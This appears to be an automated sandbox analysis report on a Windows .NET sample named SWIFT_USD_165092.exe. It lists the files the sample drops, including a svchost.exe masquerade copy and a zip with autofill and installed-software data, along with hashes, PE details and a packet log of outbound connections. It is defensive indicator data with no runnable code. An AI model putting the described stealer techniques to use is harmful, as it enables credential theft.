                                                                                      Preview:PK........P..V..U.<...M.....$.22-05-2023 22-41-22.txt.. .........:..X!...:..X!...:..X!...SVVVH.(../J-RP.r4..t.Lu......-.L..,4...@r..E.......L....4..PK........h..V..............$.BuildTag.txt.. ..........3.q!....3.q!....3.q!...PK........d..V..............$.ImportantAutofills.txt.. ...........~m!.....~m!.....~m!...PK........b..V.5..[.........$.Installed Software.txt.. ..........L.j!....L.j!...C..j!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^

                                                                                      C:\Users\user\AppData\Local\Temp\aa58ed49-d887-43de-8252-3b4f30e883d1

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):0.4393511334109407
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\acf092cf-e9ca-4ee8-8b91-35872d9c173c

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\b65d24f6-721c-4e3e-aed6-0778bb2b440a

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\b7fbbbd0-cab3-4baf-a44e-1add614b7f64

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\bb74655a-be58-42f2-a797-518825311f74

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):0.4393511334109407
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Roaming\svchost\svchost.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2164736
                                                                                      Entropy (8bit):7.996381105117679
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:P0Ux5jMHPPoTAlFra5La9wMgtHr2yyP3HkYR+:Ppx5ovTTra5KMHOfR
                                                                                      MD5:22BA147ED50FF44941FE486426432115
                                                                                      SHA1:A113BCCA40C9C420442533589311A74EF0E30E96
                                                                                      SHA-256:BEBD7434928EB7D1FB89A84BA41C3838FB5734F446B58B8BFB2D5DDDF48E518B
                                                                                      SHA-512:FF096D099A27AD7B4FBD85E2B28689ED92E9BC8AB59C0DFBBB8328284A79160507E1C7BFF31665BC07B146FAEC1268A1868E4AB0155AF00D0D38C86164870C18
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jd.................. ...........!.. ... !...@.. .......................`!...........@.................................y.!.J.... !.z....................@!...................................................... ............... ..H............text..... .. .... ................. ..`.rsrc...z.... !.......!.............@..@.reloc.......@!.......!.............@..B..................!.....H.......LG...Q............... ..........................................0..+.......~,... ....+.+...(....+.(....+.~.....(.....*...................(\...*.0..&.......~,... ....+.+...(....+.(....+..(.....*....................(....*..(\...*.0..........~]...8.....8....8....8............_....c.._......1 ~4........Y.AX.....(^...(.....+.~4......(_...(.........1 ~4........Y.AX.....(^...(.....+.~4......(_...(.......X..i....X.]-.~4.... ....(....(.......X....i?D....*.81....81....85......

                                                                                      C:\Users\user\AppData\Roaming\svchost\svchost.exe:Zone.Identifier

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1572864
                                                                                      Entropy (8bit):4.343350466599119
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:CW/mIvFzlLvRHoi1iqK79BUQ3Bw+Z1kZgaItr52wyfmog1RQiD6kC:v/mIvFzlLvRHoi1i/F
                                                                                      MD5:0C72ED6EAAA571B212480B302DA4446F
                                                                                      SHA1:00CC31852822CC49B84BC396C1D5EE0D3F8DBE50
                                                                                      SHA-256:E9A5EE0A199A9A7C5CBA8460D6F9FBFC26895AA95980B78156FF2FF659E2F10F
                                                                                      SHA-512:3900663502FB06B6814B626228F4A381196F83F4E0FBFD175AF3E16A1ABF0C13E4E197F8EF15B34030666D40DB1D5136D90FB5AB01D8146D543CBBBCD2EBC2CE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:regfY...Y...p.\..,.................. ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn88U!.................................................................................................................................................................................................................................................................................................................................................1.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):4.169392061564389
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:CV1yHUMr4LK3XJeGnyemcJ7Ujfi4RjU2xephfEu9EXv3:qZKRye
                                                                                      MD5:0262CB923B8A39D03F478D3E4B357146
                                                                                      SHA1:0516990FDD95657F7959212835F9D7B409337EE4
                                                                                      SHA-256:92CFCD1B8B9F4EA4B25BB8AE60345189116178FE5464EC013E0799B9BB178918
                                                                                      SHA-512:7F344DBBAEC103D4438E07192FACB827E860D2D84F983D70A39A2AC192E66C9F62775CE328DD47A9876FAAF44DC437EB69EED4C4452F0118C67F61DF4BAFCDED
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:regfX...X...p.\..,.................. ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn88U!.................................................................................................................................................................................................................................................................................................................................................1.HvLE.n......X....P............M.lk.I}wQ..........p............... ...0..hbin................p.\..,..........nk,.l88U!................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .l88U!....... ...........P............... .......Z.......................Root........lf......Root....nk .l88U!....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.996381105117679
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:SWIFT_USD_165092.exe
                                                                                      File size:2164736
                                                                                      MD5:22ba147ed50ff44941fe486426432115
                                                                                      SHA1:a113bcca40c9c420442533589311a74ef0e30e96
                                                                                      SHA256:bebd7434928eb7d1fb89a84ba41c3838fb5734f446b58b8bfb2d5dddf48e518b
                                                                                      SHA512:ff096d099a27ad7b4fbd85e2b28689ed92e9bc8ab59c0dfbbb8328284a79160507e1c7bff31665bc07b146faec1268a1868e4ab0155af00d0d38c86164870c18
                                                                                      SSDEEP:49152:P0Ux5jMHPPoTAlFra5La9wMgtHr2yyP3HkYR+:Ppx5ovTTra5KMHOfR
                                                                                      TLSH:C0A53308FAF5092FCE66A2FC7C3B41282ADDE46A8358FB3799D24197D0557F4A527203
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jd.................. ...........!.. ... !...@.. .......................`!...........@................................

                                                                                      File Icon

                                                                                      Icon Hash:90cececece8e8eb0

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x611cc3
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x646AB595 [Mon May 22 00:21:41 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x211c790x4a.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2120000x57a.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2140000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x20fcc90x20fe00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x2120000x57a0x600False0.4342447916666667data4.115455088227813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x2140000xc0x200False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "!"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_VERSION0x21205c0x2f8data
                                                                                      RT_MANIFEST0x2123900x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 22, 2023 19:49:52.019051075 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:49:52.168612957 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:49:52.168806076 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:49:52.181873083 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:49:52.331434965 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:49:52.331671953 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:49:52.365051031 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:52.365119934 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:52.365196943 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:52.427274942 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:52.427325010 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:52.496759892 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:52.496951103 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:52.513705015 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:52.513756037 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:52.514293909 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:52.553683043 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:49:52.720297098 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:52.720386028 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:53.982438087 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:54.028297901 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:54.184036016 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:54.184190035 CEST44349716172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:49:54.184313059 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:54.185683966 CEST49716443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:49:55.058192968 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:49:55.249615908 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:49:56.102094889 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:49:56.158345938 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:49:56.158458948 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:26.651664972 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:26.801135063 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:27.038357973 CEST8049715173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:27.089585066 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.089659929 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.089822054 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.090919018 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.090950012 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.166626930 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.166776896 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.172636986 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.172663927 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.173259974 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.244142056 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:27.250535965 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.292294979 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.405478954 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.405590057 CEST44349718149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.405684948 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.406388044 CEST49718443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.823539972 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.823584080 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.823748112 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.831954002 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.831983089 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.891031027 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.895554066 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.895572901 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.896583080 CEST4971580192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:27.943618059 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.944219112 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.944251060 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.944530010 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.944540977 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.944681883 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.944700956 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.944762945 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.944770098 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.944861889 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.944875002 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.944974899 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.944988012 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945101023 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945113897 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945218086 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945231915 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945314884 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945327997 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945405960 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945419073 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945519924 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945533991 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945626020 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945636988 CEST44349719149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:50:27.945725918 CEST49719443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:50:27.945739031 CEST44349719149.154.167.220192.168.2.5
